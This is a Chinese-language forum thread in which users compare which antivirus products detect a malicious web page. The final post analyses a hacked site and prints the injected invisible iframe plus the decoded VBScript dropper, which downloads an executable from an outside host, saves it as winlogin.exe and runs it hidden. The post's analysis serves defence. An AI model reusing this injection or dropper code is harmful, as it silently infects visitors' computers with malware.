![]() |
||
|
Major Member
![]() 加入日期: Feb 2005
文章: 103
|
引用:
上面那兩個貼圖空間KIS 6.0.2.621沒反應 |
||||||||
|
|
|
Advance Member
![]() ![]() 加入日期: Apr 2004 您的住址: 楓葉國
文章: 316
|
我用 Safari 沒安裝防毒軟體好像沒事...
(快酸 XD) |
||
|
|
|
Power Member
![]() ![]() 加入日期: Dec 2006
文章: 627
|
沒反應 ![]() |
|
|
|
Major Member
![]() 加入日期: Sep 2003
文章: 134
|
來不及了,按下去了....
真是,隨便走都會踩到地雷... |
|
|
|
Major Member
![]() 加入日期: Apr 2004 您的住址: Taipei City
文章: 102
|
引用:
小紅傘真的愈來愈強了... 但我是用卡巴~~ 我要另存這個網頁的東西,卡巴不給存... http://che.cycu.edu.tw/mphl/B76504~...howtime/jpg.htm |
|
|
|
|
Amateur Member
![]() 加入日期: Aug 2001 您的住址: 台北
文章: 37
|
使用VISTA, AVAST 沒有反應,一句話爛!!
zonealarm for vista ,捉到後自動隔離了. 另外測過nod 32 也沒反應,不知道norton掃的到嗎?or trend ?
__________________
The winner takes it all |
|
|
|
Major Member
![]() 加入日期: Aug 2006
文章: 152
|
引用:
Z...用的也是卡巴的防毒引擎. 所以抓倒是正常的.. ![]() |
|
|
|
|
*停權中*
加入日期: Jan 2007
文章: 13
|
卡巴殺豬聲真難聽....
![]() |
|
|
|
*停權中*
加入日期: Jan 2003
文章: 352
|
是上只有ghost好
有ghost的電腦像個寶 ........ 這些天幫人弄電腦 快被木馬搞瘋了 重灌 然後ghost一切ok |
|
|
|
Regular Member
![]() ![]() 加入日期: Aug 2003
文章: 82
|
http://www.wanluan-lins.com.tw/inside.html
這個網頁指引到一個iframe iframe name="main" width="591" border="0" frameborder="0" height="395" src="inside.asp"> 這是正常的 問題就在 inside.asp 被加入了這一行 <iframe src="http://che.cycu.edu.tw/mphl/B76504~/comm/UpLoad//home//images2/showtime/jpg.htm" width="0" height="0" frameborder="0"></iframe> 明眼人就知道一定有問題,幹麼沒事建立一個"看不到"的frame? 這個有問題的frame就是: http://che.cycu.edu.tw/mphl/B76504~...howtime/jpg.htm 其中有一段很機車的var HtmlStrings ,經過 psw()解碼之後,變成 <script language="VBScript"> on error resume next dl = "http://che.cycu.edu.tw/mphl/B76504/comm/UpLoad//home//images2/showtime/jpg.exe" Set df = document.createElement("object") df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" str="Microsoft.XMLHTTP" Set x = df.CreateObject(str,"") a1="Ado" a2="db." a3="Str" a4="eam" str1=a1&a2&a3&a4 str5=str1 set S = df.createobject(str5,"") S.type = 1 str6="GET" x.Open str6, dl, False x.Send fname1="winlogin.exe" set F = df.createobject("Scripting.FileSystemObject","") set tmp = F.GetSpecialFolder(2) fname1= F.BuildPath(tmp,fname1) S.open S.write x.responseBody S.savetofile fname1,2 S.close set Q = df.createobject("Shell.Application","") Q.ShellExecute fname1,"","","open",0 </script> 所以有問題的檔案就是在jpg.exe。 老實說,這個攻擊很沒有創意....別人都在用ANI Exp了,還在用這種老掉牙的技術.... |
|
|